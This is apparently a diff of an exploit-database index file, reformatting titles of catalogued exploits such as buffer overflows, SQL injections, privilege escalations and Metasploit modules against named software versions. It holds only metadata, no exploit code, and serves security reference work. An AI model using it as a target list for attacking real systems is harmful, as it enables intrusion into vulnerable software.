-19671,platforms/windows/webapps/19671.rb,"Umbraco CMS Remote Command Execution",2012-07-09,Metasploit,windows,webapps,0 +19671,platforms/windows/webapps/19671.rb,"Umbraco CMS - Remote Command Execution",2012-07-09,Metasploit,windows,webapps,0 19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow",1999-12-13,UNYUN,windows,local,0 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0 @@ -17094,7 +17094,7 @@ id,file,description,date,author,platform,type,port 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0 19731,platforms/windows/remote/19731.c,"Microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 -19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 +19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0_Network Associates for Windows NT 4.0.2/4.0.3 a_Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0 19735,platforms/linux/local/19735.txt,"Debian Linux 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 @@ -17164,7 +17164,7 @@ id,file,description,date,author,platform,type,port 19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 -19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay ActiveX control 0_Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 +19805,platforms/windows/remote/19805.txt,"GameHouse dldisplay - ActiveX control 0_Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0 19808,platforms/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",cgi,remote,0 @@ -17188,7 +17188,7 @@ id,file,description,date,author,platform,type,port 19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0 19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 TCP/IP Printing Service DoS",2000-03-30,"Ussr Labs",windows,dos,0 19963,platforms/windows/dos/19963.txt,"PHP 6.0 openssl_verify() Local Buffer Overflow PoC",2012-07-20,"Yakir Wizman",windows,dos,0 -19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote,0 +19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote,0 19829,platforms/php/webapps/19829.txt,"Joomla OS Property 2.0.2 - Unrestricted File Upload",2012-07-14,D4NB4R,php,webapps,0 19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,102 19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 @@ -17285,8 +17285,8 @@ id,file,description,date,author,platform,type,port 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote,0 19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing DoS",2000-05-24,"Ussr Labs",multiple,dos,0 -19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote,0 -19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,Metasploit,windows,local,0 +19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 - xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote,0 +19930,platforms/windows/local/19930.rb,"Windows - Escalate Task Scheduler XML Privilege Escalation",2012-07-19,Metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,Metasploit,windows,remote,998 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 @@ -17376,7 +17376,7 @@ id,file,description,date,author,platform,type,port 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20027,platforms/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 Source Code Disclosure",2000-06-21,"Foundstone Inc.",multiple,remote,0 20028,platforms/windows/remote/20028.rb,"Simple Web Server Connection Header Buffer Overflow",2012-07-23,Metasploit,windows,remote,0 -20029,platforms/php/webapps/20029.rb,"EGallery PHP File Upload",2012-07-23,Metasploit,php,webapps,0 +20029,platforms/php/webapps/20029.rb,"EGallery - PHP File Upload",2012-07-23,Metasploit,php,webapps,0 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 @@ -17391,7 +17391,7 @@ id,file,description,date,author,platform,type,port 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",unix,local,0 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Buffer Overflow",2000-06-29,"Matt Conover",linux,remote,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 -20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 +20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server",2000-06-21,"Michael Zalewski",unix,remote,0 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",windows,remote,0 20047,platforms/windows/dos/20047.txt,"Microsoft Windows 2000 - Telnet Server DoS",2000-06-30,"SecureXpert Labs",windows,dos,0 @@ -17399,7 +17399,7 @@ id,file,description,date,author,platform,type,port 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",windows,dos,0 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0 -20053,platforms/windows/local/20053.py,"MyMp3 Player Stack .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 +20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 Password File (1)",2000-06-16,pbw,unix,local,0 @@ -17414,9 +17414,9 @@ id,file,description,date,author,platform,type,port 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0 20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal",2000-07-11,"Eric Hines",cgi,remote,0 -20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos,0 +20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos,0 20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",windows,remote,0 -20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack",2000-03-10,"Charles Chear",cgi,dos,0 +20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote DoS Attack",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 20074,platforms/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Buffer Overflow",2000-07-13,Wizdumb,windows,remote,0 @@ -17445,7 +17445,7 @@ id,file,description,date,author,platform,type,port 20098,platforms/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",multiple,dos,0 20099,platforms/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - DoS",2000-07-25,wildcoyote,windows,dos,0 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 STAT/LIST Command DoS",2000-07-21,"Blue Panda",windows,dos,0 -20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0 +20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command - Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0 20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - %00 Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0 @@ -17454,8 +17454,8 @@ id,file,description,date,author,platform,type,port 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0 20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload",2012-07-27,Metasploit,php,webapps,0 -20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT ActiveX Control Buffer Overflow",2012-07-27,Metasploit,windows,remote,0 -20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",2012-07-27,Metasploit,linux,remote,0 +20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow",2012-07-27,Metasploit,windows,remote,0 +20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - pbcontrol.php Command Injection",2012-07-27,Metasploit,linux,remote,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0 20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",linux,remote,0 @@ -17499,15 +17499,15 @@ id,file,description,date,author,platform,type,port 20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0 20162,platforms/hp-ux/local/20162.txt,"HP-UX 11.0 net.init RC Script",2000-08-22,"Kyong-won Cho",hp-ux,local,0 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0 -20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 -20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 +20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 +20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20166,platforms/php/webapps/20166.txt,"Joomla com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0 20167,platforms/linux/dos/20167.txt,"eGlibc Signedness Code Execution",2012-08-01,c0ntex,linux,dos,0 20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) - SQL Injection",2012-08-01,D4NB4R,php,webapps,0 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 -20173,platforms/php/webapps/20173.rb,"WebPageTest Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0 +20173,platforms/php/webapps/20173.rb,"WebPageTest - Arbitrary PHP File Upload",2012-08-02,Metasploit,php,webapps,0 20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",2012-08-02,Metasploit,windows,remote,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 @@ -17536,11 +17536,11 @@ id,file,description,date,author,platform,type,port 20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (3)",2000-10-17,zipo,windows,remote,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver - Privilege Escalation",2012-08-02,anonymous,linux,local,0 -20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,Metasploit,windows,remote,0 +20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT - ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,Metasploit,windows,remote,0 20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 - SQL Injection",2012-08-03,Metasploit,windows,remote,0 20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,Metasploit,unix,remote,8080 -20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 -20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 +20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B - Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 +20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B - .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal",2000-09-07,pestilence,php,webapps,0 20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local,0 20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 - WebDAV Directory Listings",2000-09-07,Mnemonix,linux,remote,0 @@ -17571,7 +17571,7 @@ id,file,description,date,author,platform,type,port 20235,platforms/windows/remote/20235.pl,"Cisco Secure ACS for Windows NT 2.42 - Buffer Overflow",2000-09-21,blackangels,windows,remote,0 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 - Installed Package Disclosure",2000-09-21,t0maszek,linux,remote,0 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - 'From:' Field Buffer Overflow",2000-09-23,Arkane,linux,remote,0 -20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 +20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP DoS",2000-09-26,DCIST,multiple,dos,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 Weak Encryption",2000-09-26,@stake,palm_os,local,0 @@ -17594,7 +17594,7 @@ id,file,description,date,author,platform,type,port 20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 -20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 +20543,platforms/windows/local/20543.rb,"Windows - Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 @@ -17618,7 +17618,7 @@ id,file,description,date,author,platform,type,port 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - DoS",2000-10-09,zillion,windows,dos,0 20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / Me Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote,0 20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / Me Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 -20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 +20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 20286,platforms/php/remote/20286.c,"PHP 3.0/4.0 - Error Logging Format String",2000-10-12,anonymous,php,remote,0 20287,platforms/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Buffer Overflow",2000-10-10,@stake,windows,remote,0 20288,platforms/windows/remote/20288.c,"Microsoft Windows 9x File Handle Buffer Overflow",2000-07-10,Nsfocus,windows,remote,0 @@ -17630,12 +17630,12 @@ id,file,description,date,author,platform,type,port 20294,platforms/unix/local/20294.txt,"XFree86 3.3.5/3.3.6 Xlib Display Buffer Overflow",2000-10-12,"Michal Zalewski",unix,local,0 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 -20297,platforms/windows/remote/20297.rb,"Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,Metasploit,windows,remote,0 +20297,platforms/windows/remote/20297.rb,"Oracle AutoVue - ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,Metasploit,windows,remote,0 20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode - Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - File Upload",1999-01-30,Mnemonix,windows,remote,0 -20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 +20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 20308,platforms/linux/remote/20308.c,"Samba 1.9.19 Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0 20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 newdsn.exe File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0 @@ -17650,7 +17650,7 @@ id,file,description,date,author,platform,type,port 20318,platforms/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE",2012-08-07,rgod,windows,remote,0 20319,platforms/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion",2012-08-07,rgod,windows,remote,0 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 -20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,Metasploit,windows,remote,0 +20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 - Active X Control Arbitrary Code Execution",2012-08-08,Metasploit,windows,remote,0 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request DoS",2000-10-25,"Alberto Solino",hardware,dos,0 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 @@ -17659,7 +17659,7 @@ id,file,description,date,author,platform,type,port 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 - Username Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File",2000-10-20,"Kyong-won Cho",hp-ux,local,0 -20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0 +20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote - Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow",1997-07-21,"D. J. Bernstein",unix,local,0 @@ -17715,7 +17715,7 @@ id,file,description,date,author,platform,type,port 20383,platforms/windows/local/20383.txt,"Microsoft IIS 4.0 ISAPI Buffer Overflow",2000-11-06,"Marc Maiffret",windows,local,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0 20385,platforms/linux/local/20385.sh,"RedHat restore 0.4 b15 - Insecure Environment Variables",2000-11-04,fish,linux,local,0 -20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 registrar Local Arbitrary File Read",2000-11-08,"J.A. Gutierrez",hp-ux,local,0 +20386,platforms/hp-ux/local/20386.txt,"HP-UX 10.20 registrar Local - Arbitrary File Read",2000-11-08,"J.A. Gutierrez",hp-ux,local,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0 20390,platforms/php/webapps/20390.txt,"Joomla FireBoard Component (com_fireboard) - SQL Injection",2012-08-09,Vulnerability-Lab,php,webapps,0 @@ -17731,7 +17731,7 @@ id,file,description,date,author,platform,type,port 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS",2000-11-10,sozni,cgi,dos,0 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS",2001-06-19,"John Percival",multiple,dos,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0 -20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0 +20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe - Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0 20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS",2000-11-14,"403-security team",windows,dos,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow",2000-11-14,Vort-fu,beos,remote,0 